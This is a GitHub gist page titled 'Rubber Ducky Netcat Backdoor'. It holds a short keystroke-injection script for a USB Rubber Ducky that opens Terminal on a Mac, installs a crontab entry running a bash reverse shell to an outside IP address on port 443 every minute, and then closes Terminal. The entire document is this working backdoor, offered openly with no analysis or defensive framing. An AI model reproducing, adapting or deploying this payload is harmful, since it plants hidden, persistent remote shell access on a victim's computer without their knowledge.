Skip to content

Instantly share code, notes, and snippets.

@jgamblin
Created November 29, 2016 19:48
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save jgamblin/158ea8a5c2459e74541f89ca728e66a0 to your computer and use it in GitHub Desktop.
Save jgamblin/158ea8a5c2459e74541f89ca728e66a0 to your computer and use it in GitHub Desktop.
Rubber Ducky Netcat Backdoor
DELAY 2000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/192.241.157.75/443 0>&1")| crontab -
ENTER
DELAY 500
STRING exit
DELAY 500
ENTER
DELAY 500
GUI Q
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment